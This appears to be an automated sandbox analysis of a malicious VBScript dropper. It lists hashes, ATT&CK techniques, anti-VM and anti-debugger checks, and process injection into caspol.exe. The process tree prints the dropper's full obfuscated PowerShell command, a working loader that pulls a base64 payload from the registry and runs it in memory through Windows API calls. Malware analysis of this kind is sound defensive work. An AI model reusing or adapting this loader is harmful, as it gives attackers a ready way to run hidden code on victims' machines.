8134cd2cdc9e2de14e9e7c172cf0d21f4487b2a6138cee7cfe31aaf3e51cea38

General

Target

swift_171122_004282741.vbs
Size

370KB
MD5

a82f7d67394a27c89d9b031cd33519dc
SHA1

8c8380b6ee1c7fa18d81bc3c13a5d47513e541ce
SHA256

9c19f70567380da124d3cf07402a79b0801bc075a9b58e22055a489f801823ed
SHA512

38f536ba12de9d4534cf45217b8615fcbd548d9d412b72d27368c9c224a450aeff0b7fd82c5d8e2529f7e57216a5a8902f9448de3c5438f0b00aa8d7a5ae9ec3
SSDEEP

6144:fkC1Fb24JNP0SzlXIy4Mpig4bp+Yz+bIaXZ3xrIWIUzkIsZ/sImKIfx/skINxF0B:DFb2aP0StIy4E4l+PDf+O

Score

7^/10

Malware Config

Signatures

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.execaspol.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	caspol.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.execaspol.exe

pid process

1892 powershell.exe
1296 caspol.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1892 set thread context of 1296 1892 powershell.exe caspol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1892 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1892 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1892 powershell.exe

pid	process
1892	powershell.exe
1296	caspol.exe

description	pid	process	target process
PID 1892 set thread context of 1296	1892	powershell.exe	caspol.exe

pid	process
1892	powershell.exe

pid	process
1892	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1892	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 668 wrote to memory of 980	668	WScript.exe	cmd.exe
PID 668 wrote to memory of 980	668	WScript.exe	cmd.exe
PID 668 wrote to memory of 980	668	WScript.exe	cmd.exe
PID 668 wrote to memory of 1892	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 1892	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 1892	668	WScript.exe	powershell.exe
PID 668 wrote to memory of 1892	668	WScript.exe	powershell.exe
PID 1892 wrote to memory of 1996	1892	powershell.exe	csc.exe
PID 1892 wrote to memory of 1996	1892	powershell.exe	csc.exe
PID 1892 wrote to memory of 1996	1892	powershell.exe	csc.exe
PID 1892 wrote to memory of 1996	1892	powershell.exe	csc.exe
PID 1996 wrote to memory of 880	1996	csc.exe	cvtres.exe
PID 1996 wrote to memory of 880	1996	csc.exe	cvtres.exe
PID 1996 wrote to memory of 880	1996	csc.exe	cvtres.exe
PID 1996 wrote to memory of 880	1996	csc.exe	cvtres.exe
PID 1892 wrote to memory of 1296	1892	powershell.exe	caspol.exe
PID 1892 wrote to memory of 1296	1892	powershell.exe	caspol.exe
PID 1892 wrote to memory of 1296	1892	powershell.exe	caspol.exe
PID 1892 wrote to memory of 1296	1892	powershell.exe	caspol.exe
PID 1892 wrote to memory of 1296	1892	powershell.exe	caspol.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\swift_171122_004282741.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\System32\cmd.exe
cmd /c echo C:\Windows
2⤵
PID:980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Bestea = """MergeAAbettdStatsdKoran-TelepTOvermyIndbapIndpieBatho Grown-DermaTOboisyFalkepRealseOpereDpolloeAnatmfReguliSynennOpdraiMilletskoveiByousoNonsanClean Holla'CiconuUdstesFavouiRekurnRegragLystg tomtiSLarynySnapssPalaetByudveDiscomBitin;ArbejuHemmesKalkbiForsknAzotegFodre KantoSTilbayProtosAutoatStudeepinatmKonti.PrebuRAbsinudiskrnOntogtImmoriNedstmStrideJaege.ArveoImatisnOverdtLakrieBrandrUnfanoReadvpSprinSInsemePelserCytogvEkspriUstilcBigmoeBrunhsRakle;vinbjpArresuManvrbStetilDisksiObtencIndha TinsesFrikatUnilaaFladptPlotziGarrucOvers hjvancKomedlBioscaFunctsUbekvsRepro DochmDCockaiRattlsEjno cFde DaAfhvllFormadSkede1mopan{Hoop [DecafDReduplDybdelIndgaIAssafmInchapStaaloConnerThanatMelet(Reuni`"""helbrATrichDRedebVAmtsrALntilPStibiIBalan3Conne2Porki.ErstaDGluceLPlankLteleo`"""klumm)Konfe]BrainpTeskeuFrstebCsp ClAere iUntipcPians TonalsBiprotSemidaaastetjudahiChamocCirce MindseKittexSlegftVascueStadirPseudnAnlbe HerreiUndernskatttExacu GenhrSSindseSignatMisvkASecohcaccoulArtsnIEfternTilbafMistaoFaarerBarsemPauncaSemidtpseudiCentioNonefnUnder(UnperiFortrnUdsnitGtema GlobeVFerroeBathelGentogBroch,favorihypopnJealotSynde AnimaFRetoraChillvBorghoOer S,GrammiSrbehnWerootcatac WrongNOvercoLnsatnUla EdCoupj,HexapiEkspenOrthotFlang ila sSDaabspTsk PoSmrblukvind)Tavle;Polyp[TenmaDKreatlgaraglSkoleIKluntmShylopUnsneoVidnerInvultSikke(Markf`"""GrundselecthFadebeUnderlMetaplBoatk3Unter2Bardu.ReplodFrumelPakehlBivaa`"""funkt)Diadr]VejrfpDagosukanflbenfielSporviGldsfcBjerg JuditsCactatPostpaSandstSaaniiPlanlcTilbu doradeCommuxBreestBlackefarisrFitzgnUnaci QuailiVilkanNonvatSuper NedkoDHreceuSemifpboanelEfteriRatiocAfburaAfluktLednieForhaIBybuscFetisoMassanCleat(BogmaiskaksnAfvejtLille SicklFAlteraBunkrsIntertRoperlFangs,IrrefiMetrinPaeantBespo SelspTBadravDaaneaSlumr)Crebr;Funkl[BegynDNeogulCommilUnsecIBogbimTranspBlkkeoProstrFeltwtminit(Udski`"""InteruBrudesClaireInadvrBrnes3Dumpe2Trass`"""Skrib)Hjael]ChopipUnderuProdubruskulgenskiMinercKlass selahsWithttTagreaCounttLoraniLgnhacPoole AntageInterxLivsmtSwathestrucrHygienFnise BajonicultunTrasstHyalu BhokrGDoxoleOctodttittlCPlantlCrawliElutrpDartabEndeloEnnuyaRafterPipiddHumbuVSucraigtefleProgrwBarseeBleedrPermi(Nonli)Nedsl;Necta[BotanDForsnlTakkelAfvrgIFantamdemerpBestooPinnarInfratGeorg(Altin`"""approgTopfodBrshaiKlere3Slags2Denty`"""Vedli)Dobbe]ToplepSkalpuToivebBortflUnchaiBillecNonco MaurisNonadtForruaPantetIndskiNonopcBlemo IntegeOnionxYdergtSunnieChlamrBasilnCenta NoncoiProtenSkridtPrveb ViderGSoveseOrthotAdmonWCoursiFilmsnHydrodUnfacoJambewUnseaEYpurixBrigitInditEUnmixxUnran(TralliAnimanTilhotTilsy IntegSSymbojBesvaiblkstpForbr,GryntiIndesnExtrotPrinc ForudpalmonrHeroieSaxo eMarrodSchrouproud)Twirl;fissi[ModtaDFjernlPseudlAnvenIMetavmLigkipMunkeoRulskrSupertBruna(Measl`"""KabinkFrugaeAntiurEvangnForhaeNetfilTelek3Theoc2Yods `"""Gutte)Aften]DebutpGradyuTrywobBiblilOutlaiSickrcUnpan lignisGuzzltZankeaUnfactEliteiAffrdcFinpu RolleeRestkxStruttCeneseUndisrModtanVitil ShavevElgkooStanniFlgesdmalme BookmGSlmmeeAffiltMoqueSTungetErhveaskrivrMaatttManhauArd SpMosegIUnpronRequifCompuoScath(AkseliNedklnCapittEnsar StrenmGardeiUnacccEndoskVeridsPrionkunder)Skife;Vesic[AccenDgelatlCocoblVkstrIJaguamForklpBeskyoEksekrNappetUnico(Ldrei`"""SnagegFortrdDihydiStyks3Dadai2Shed `"""Ateli)Telef]VirkepGastruGned bPulsalSvaneiBreezcShetl Leet sInsultAmidoaTkkeltCodifiBrandcTorbi lssaleSateexSmovstPredaeundetrHypopnbesty KonjuiGnathnWattmtCount SpeccRAfliveOmviscStorvtRegloVCannoiAdelssBundmiEdifibPoesilAntireBagud(RessoiExaudnMauqutAnnua PargiPSkattrDisbuoUdfludVkstrutilgi,TeutoineonanBalattBisku ForanMLovniuMuligtBusteaBugen)Emmen;Jarra[StounDFalkelBarralRomneIskndimKnallpSexolosullarStoertSorpt(Inode`"""ItaligSaccodTilskiMorak3tapa 2Cunni`"""Grain)Filos]EpizopWattluPrefrbSkiftlOveraistelpcDaphn RennasMicostElephaSighstBradyiExotecSauna SpeciePlasmxDialytSubgeeVairerFilmfnStedb TardyiAzorinSatintdikdi RomerBFalseiDiplotEnergBAdvoclRethrtUdpos(VinyliRappenMyeletbaadf VermiPAlcohaNeutrsReptisAktrioPhyso,NonabiKankinBrandtGusse AndanKBalfaoAmazubMillilPresseSpade,TsotsiHambonTerritTroos PlaceAMomusnEdentlomheggTegnesGreen,PartiiSyrinnKonsutRewok FlintLMaaltocomarwNulpuiAgathnZestf,OsciliIndtrnHarostSejlg DrejeTBreraicardulSimarkTabb eClogg,separiSymbonChamptWokow AdjudoWirempLorelbLabor,hjordiExactnPoppatPunkt TalmaUFriginTriumgArkitaindisiSocia,MarkuiPortenSvmmetBigwi ProduHAutomeKonveaNuancdReinswTeleg,GlutaiOvernnHallutRende RuelsdKnollaRegremSkyggbAirbu)Forli;Barfr[CitizDPurislUdflylTilkaIBeboemAmatrpCretooPenalrFerritHeter(South`"""SponskNavleeSweetrSkratnPainfeChecklreuma3Subho2Uddan`"""Seksu)Kunst]TiwazpTroguuNannybEmblelEtiquiHematcKolon rabbesFalmntfasnaaEnsfatHandiiOvnhuctegua semireReanvxSensitNordceOdontrUbestnMilie TilleiAfgrsnbaryctThew LinebVSlagliNedarrquaggtSynsruFabriaFyldnlVekseAMultilInstalFlyveoteachcFreti(CanceiUdfornServitJebus EserivRustr1Reson,CloisiProtrnHermetBands IodinvTakst2Statu,CenteiMaalbnFanebtDrago KntrevUnbur3Telef,StoryiForvenmorgetSussy BestyvDeifi4brugs)maart;Drank[EndleDAirmolCort lHandlIEcdysmForstpGynaeoEnglerKinemtdolic(Cerem`"""nonthAMeddeDDamebVCloysASlagvPChansIAlaba3Semic2Reaff.DuarcDMarxiLStatuLForbr`"""Genio)unlaw]StonepMizenuBaronbBilralAbonnifratrcNabor UrnerseuclitEllehaparantPseudiApoutcVi Tr tenneedeterxkatoltStalaearararRefranMorat MiscoiMisplnPneumtOpvel FremrRIngenemethogPhiliFNightlInteruFornusLiposhMiljeKUdkikeAmnioyRaptu(DukesiAktienSpecitUndis UnderfToppeuAdiaplTopta)Brest;Leias[domstDConsplSodamlReninIAttramKolumpSaracoCarpirDefeatKonvo(Micro`"""VaabeuStjrtsundereSanderSluts3Valgf2Angor`"""Bezoa)promp]FortrpOste uNotelbDrogelAppliiDispocPrgen TerresGeneatAvocaaExpectStatsiUnmencUnmon KorsteRimfrxUndertBjlkeeNiobarPuddenBenze HyposIRevsenrapidtPostvPMenditMeretrAnled ElastEoversneternuImmatmHegl WOrthiiBrugenFuldtdSurteoSqueewregenSmarvetBeakeaKirketDataeiJolleoUdartnBistasspillWHoved(OutpruHstpaiyandenEkspetFlocc SceptvPoste1Zitzi,LengeieskatnKontrtUtilb FristvAgurk2Drabs)Ufuld;Lande}Smags'Brdte;Smsyn`$HornaDTungeiHellbsAnnamcTalshagarmelTeleddMoney3Nordo=Athyr[GlaivDLatiniDecidsExactcdeictaFastglSnow dDesol1Orkes]Petti:Skage:ForbjVNickeiLustirDetaitPosthubagdraModerlFaderAVersilForellCompeoPolarcAnden(Overc0Nonou,Polit1Nonra0Stuff4Vandk8Strog5Levit7Enkel6Crimi,Dagtj1Forma2Takne2samor8Fasts8Opert,Haand6Renna4Abteg)Padde;Scava`$AdmirFcareeoPradorFornehNonhaoPrintlmaybedNondeeUnesclHeksa=Skrik(BagerGNonfreSgelntRetsk-BellhIInga tSammeeAendrmSudsePRammerGleanosildepSpareeGreenrTigertDoedsyCourt Rekon-RestsPKnapsamispotFejlrhTekst Berig'VelprHGravmKImpetCUnbeaUpaake:Srska\LanceVAlloklHalvnaLowbrdMyxoiaDissiaLyoly\PenduMTrkfuaForderSnylttTiminysddonrFostedHydradGlatnaBaneg'Grill)Tiltu.DisplDTusinrTiltreLob EnFoundgFaldseStrukblkkesaHomoerOverd;Semae`$VandgRCologhFloreeAcetyoudbudlHmorioFrior Sylte=Tofag Huski[sportSungenyMiljpsPerpettrovreFgtekmBesti.FrgetCphytooGjernnMexicvLimu eSublurblyantBankb]Typec:Skotj:InterFSpdbarSekteomouthmGrundBStencaCuttysMiliteTrans6Restr4GanglSbandetMorfirHyperiBagstnAffalgBesta(Udsta`$SundrFHjlpeoOutvorDelophEndocoTyg AlDistidKneadePositlJubil)Baand;Apico[GulvbSAgamiyForsysunreptSljfeeUdtagmUnder.fremrRSuboruXylonnRegeltConsuiTriramAdvereTrisu.DolkeIAver nGardetBilleeteknorAlveuoiberepAttriSThilleFragmrUnrotvChoriiAcmiscKerateKildesKrest.PreseMCognoaHyperrRumfasSllethMoralaStumplBygni]Trkni:fored:MargaCIndskoSyncrpTroglyunder(Vista`$PaataRAcarohTilgoeOvertoCreatlAdspuoStepe,Bjerg Smuth0Tyrke,Uncal Udbor Batik`$OutbrDStabiiBagstsusselcEmanaastrmklForeldOphid3Model,Rescu Delpr`$LandsRPokanhKamfeeNulstoBlocklLeptooCockp.WendicEnebooDmarcuHomesngammattilta)Cicat;Phleb[sulphDShabeiStripsUnequcSissiadeplolHamzadComor1Clado]Water:verme:AllerEKarmanSlippuSchelmKabinWSnapsiOmbrynEuthydKompeoFormiwSkydeSAscertSupraaTailytRingliDkmanoDecrenLflassCaterWSampl(Delst`$ParabDUncariDecimsCeraucKonseaAmpullJase dFerme3Tenac,Tmmer Sirup0Polyt)Opad #Calot;""";Function Discald4 { param([String]$HS); For($i=5; $i -lt $HS.Length-1; $i+=(5+1)){ $Hypostat = $Hypostat + $HS.Substring($i, 1); } $Hypostat;}$Unofficial0 = Discald4 'resbeIKvsteEPandeXHings ';$Unofficial1= Discald4 $Bestea;& ($Unofficial0) $Unofficial1;;"
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1892

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bm7zbl3u.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES47EB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC47DA.tmp"
4⤵
PID:880

C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1296

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES47EB.tmp

Filesize
1KB

MD5
0722ef10551ef809844fd7790fb6e1e1

SHA1
ff26baaabe9638b6e22d3d0c34488c196cbf6d64

SHA256
3217abebf1b0590086b3a938645a7a2fa7799920f9ca109c31ccd4b0cc0b037f

SHA512
913c9368847cf66328260eb0d3dc1d0585ae05e1c1b04c1ac3b25248880008657faf0802c1ff975b9631726a839026a51728a80661b451814d03ce254c9efbd0

Download Submit
C:\Users\Admin\AppData\Local\Temp\bm7zbl3u.dll

Filesize
4KB

MD5
6b4b39f83486d1e12dcc6d81b2a84e4b

SHA1
fe2596cef80573362d86db817daed747d742e8ff

SHA256
047d8a88267352fa272101d133f4b162d23ec93589f80f1bb9d6d441ff860812

SHA512
fe6075ba10e48c42e7dad5a96792cd2e884f0ee1ffb2900ecc5fc96c2c4273249f67f76ffaa5472952c42a13951cf773c605aa329a5113c5f64c70b06211db38

Download Submit
C:\Users\Admin\AppData\Local\Temp\bm7zbl3u.pdb

Filesize
7KB

MD5
a6536ec2c5573a21903b418dd22dd575

SHA1
dafa08e4533ffdee7bb7ef527f2d84aba6d20287

SHA256
be224c9c9dd09c1787ffe5b585bc51c172a22dd52c9d558cc39a09110c36a6e3

SHA512
b9607dc9b64a1bf63137b68659753c9ce8a6155985404a598d1fbd37cc0b098670c58f2f382eec3f409f54b9c5e43167879df2dcbe52ae3bc432ea24f29d4b48

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC47DA.tmp

Filesize
652B

MD5
d44be5dd137ff56b039412b9a3c3b93b

SHA1
dc5adbfb247121a73c26830357a147a63397260d

SHA256
cbffc42f5744d541689625e9a8525f841472f621d8f3bb3d00f3393f9650434e

SHA512
3b7089df4bc60f1b884833c76c275873b8b9072d3c77d3edded4268089efae185603fcf12eee5734905a15e4721e0222f9b5ac8070f6286850a4d4863d6854e3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bm7zbl3u.0.cs

Filesize
963B

MD5
2b12136b78b40404d47f0640d466df7b

SHA1
457f4f2727d678a37fed9ffc11444737ca1dbc4b

SHA256
31cf0506cb4748ceaa97794b3dafb0f1584326712d875234d5451f2df512e143

SHA512
66f4938ec8b54df1976a750ae554ea7a33db6d1d9cd925da3a44698807f45575d6ed180d9414f0a83ac3f32fc8496b5020fba9ab0bf1bdb4a56864037ca57330

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bm7zbl3u.cmdline

Filesize
309B

MD5
8a2d14c98ded3004f9569ea023fd2fa7

SHA1
9694dad0d54c25334d5b9c68985f94708181b825

SHA256
f4327aa4e9a24b695b71d387e62adae057ddfd26a472d148f0ccf60d573cfbe3

SHA512
c488bf21dcfc7c64d08e6ad603a11649d689b47b203c88e018d4a7358b10b69e639302275eafddc20e8b847e56713e3ef6fb03b420dd1ea874e426b346b36cf6

Download Submit
memory/668-55-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp

Filesize
8KB

Download
memory/880-62-0x0000000000000000-mapping.dmp

Download
memory/980-54-0x0000000000000000-mapping.dmp

Download
memory/1296-76-0x0000000000200000-0x0000000000300000-memory.dmp

Filesize
1024KB

Download
memory/1296-82-0x0000000000200000-0x0000000000300000-memory.dmp

Filesize
1024KB

Download
memory/1296-85-0x0000000077170000-0x00000000772F0000-memory.dmp

Filesize
1.5MB

Download
memory/1296-86-0x0000000077170000-0x00000000772F0000-memory.dmp

Filesize
1.5MB

Download
memory/1296-87-0x0000000077170000-0x00000000772F0000-memory.dmp

Filesize
1.5MB

Download
memory/1296-84-0x0000000077170000-0x00000000772F0000-memory.dmp

Filesize
1.5MB

Download
memory/1296-83-0x0000000076F90000-0x0000000077139000-memory.dmp

Filesize
1.7MB

Download
memory/1296-72-0x0000000000FE8A9E-mapping.dmp

Download
memory/1892-68-0x0000000073A10000-0x0000000073FBB000-memory.dmp

Filesize
5.7MB

Download
memory/1892-67-0x0000000004FA0000-0x00000000050A0000-memory.dmp

Filesize
1024KB

Download
memory/1892-75-0x0000000077170000-0x00000000772F0000-memory.dmp

Filesize
1.5MB

Download
memory/1892-73-0x0000000076F90000-0x0000000077139000-memory.dmp

Filesize
1.7MB

Download
memory/1892-80-0x0000000077170000-0x00000000772F0000-memory.dmp

Filesize
1.5MB

Download
memory/1892-81-0x0000000077170000-0x00000000772F0000-memory.dmp

Filesize
1.5MB

Download
memory/1892-69-0x0000000004FA0000-0x00000000050A0000-memory.dmp

Filesize
1024KB

Download
memory/1892-74-0x0000000077170000-0x00000000772F0000-memory.dmp

Filesize
1.5MB

Download
memory/1892-89-0x0000000077170000-0x00000000772F0000-memory.dmp

Filesize
1.5MB

Download
memory/1892-58-0x0000000073A10000-0x0000000073FBB000-memory.dmp

Filesize
5.7MB

Download
memory/1892-57-0x0000000075981000-0x0000000075983000-memory.dmp

Filesize
8KB

Download
memory/1892-56-0x0000000000000000-mapping.dmp

Download
memory/1892-88-0x0000000004FA0000-0x00000000050A0000-memory.dmp

Filesize
1024KB

Download
memory/1996-59-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing